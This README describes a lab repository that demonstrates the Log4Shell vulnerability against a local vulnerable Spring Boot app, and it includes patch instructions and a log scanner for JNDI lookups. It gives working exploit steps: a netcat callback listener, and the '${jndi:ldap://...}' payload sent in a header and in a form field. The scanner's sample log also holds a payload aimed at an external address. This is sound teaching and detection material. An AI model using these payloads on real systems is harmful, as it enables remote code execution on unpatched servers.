This repo contains all you will need to demonstrate the Log4Shell vulnerability using a Java LDAP server from Marshalsec, a Python file server and a Spring Boot web application.
- Asinsa Guniyangodage (850617)
- Joshua Murray (1903122)
- Docker and Docker Compose (https://docs.docker.com/compose/install/)
- JDK 11 (or newer) (https://www.oracle.com/java/technologies/downloads/)
- Linux (commands assume this, but may work on Windows)
- Netcat
  - Debian: sudo apt install netcat
  - Arch: pamac install gnu-netcat
  - RHEL: yum install -y nc
  - Mac: brew install netcat
- Clone the repository.
- Navigate to the source folder:
  cd Log4ShellDemo-main
- Run the Docker containers for the Java LDAP server and the Python file server using Docker Compose:
  docker compose up
- Wait for the containers to start up. You should see output in the terminal indicating that the containers have started successfully, such as:
  log4shelldemo-marshel_ldap-1 | Listening on 0.0.0.0:1389
  log4shelldemo-file_server-1 | Exploit java class created success
  log4shelldemo-file_server-1 | Starting Webserver on port 8000 http://0.0.0.0:8000
- Start the Spring Boot web app, either the exploitable build:
  java -jar ./VulnerableServer/VulnerableWebApp/target/VulnerableWebApp-exploitable.jar
  or the patched build:
  java -jar ./VulnerableServer/VulnerableWebApp/target/VulnerableWebApp-patched.jar
- For either approach you need netcat listening for incoming connections. Start it with:
  nc -lvnp 9002
- In another terminal, send a curl request to the web server:
  curl 127.0.0.1:8090/test -H 'X-Api-Version: ${jndi:ldap://localhost:1389/a}'
- You should see a new connection on netcat:
  foo@bar:~/Log4ShellDemo$ nc -lvnp 9002
  Connection from 127.0.0.1:40174
- For the form-based approach, navigate to http://127.0.0.1:8090/form
- Enter ${jndi:ldap://localhost:1389/a} as the Name and submit the form.
- You should see a new connection on netcat:
  foo@bar:~/Log4ShellDemo$ nc -lvnp 9002
  Connection from 127.0.0.1:40174
To patch this vulnerability, run the web application with the command below:
java -jar ./VulnerableServer/VulnerableWebApp/target/VulnerableWebApp-patched.jar
This web app has been modified to include the following line, which disables JNDI lookups:
System.setProperty("LOG4J_FORMAT_MSG_NO_LOOKUPS", "true");
An alternative patch that removes all vulnerabilities related to Log4j is to remove the explicit version tag from the log4j dependencies in pom.xml, as they have been patched as of version 2.17.
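Independently of the patch, it is useful to be able to spot the lookup strings this demo sends when they show up in a request log. The following Python scanner is an added example, not part of this repository: it assumes a constructed log layout in which each request field is written as name="value", flags any JNDI lookup in those fields, and separates callbacks to the local machine (as in this demo) from ones pointing at another host.

```python
import re
from dataclasses import dataclass
from ipaddress import ip_address

@dataclass
class Finding:
    line_no: int
    field: str      # logged request field carrying the payload (header or form field)
    scheme: str     # ldap, ldaps, rmi, dns or iiop
    target: str     # host[:port] the lookup would make the server connect to
    loopback: bool  # True when that host is the local machine, as in this demo

# Log4j lookup syntax used by the demo: ${jndi:<scheme>://<host>[:<port>]/<path>}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>ldaps?|rmi|dns|iiop)://(?P<target>[^/}\s]+)", re.IGNORECASE)
# Assumed log layout (not the demo's real format): each request field as name="value"
FIELD_RE = re.compile(r'(\S+)="([^"]*)"')

# Constructed sample log, not real traffic: the two demo requests, a benign request,
# and one whose target is a non-local host (198.51.100.7 is a documentation address).
SAMPLE_LOG = """\
2021-12-10T12:00:00Z POST /form name="${jndi:ldap://localhost:1389/a}"
2021-12-10T12:00:01Z GET /test X-Api-Version="${jndi:ldap://localhost:1389/a}"
2021-12-10T12:00:02Z GET /test X-Api-Version="1.0" User-Agent="curl/7.79.1"
2021-12-10T12:00:03Z GET /test X-Api-Version="${jndi:ldap://198.51.100.7:1389/x}"
"""

def _is_loopback(target: str) -> bool:
    # Strip a single ":port" suffix; bracketed IPv6 targets are not handled here.
    host = target.rsplit(":", 1)[0] if target.count(":") == 1 else target
    if host.lower() == "localhost":
        return True
    try:
        return ip_address(host).is_loopback
    except ValueError:
        return False

def scan_request_log(lines):
    """Return one Finding per JNDI lookup found in any logged request field."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        for field, value in FIELD_RE.findall(line):
            for m in JNDI_RE.finditer(value):
                findings.append(Finding(line_no, field, m["scheme"].lower(),
                                        m["target"], _is_loopback(m["target"])))
    return findings

if __name__ == "__main__":
    for f in scan_request_log(SAMPLE_LOG.splitlines()):
        where = "loopback" if f.loopback else "EXTERNAL"
        print(f"line {f.line_no}: {f.field} -> {f.scheme}://{f.target} ({where})")
```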
- The LDAP server was built using the Marshalsec repo here, which is under an MIT License.
- CSS for the form page was taken from the Glassmorphism login Form Tutorial in html css here, which is also under an MIT License.
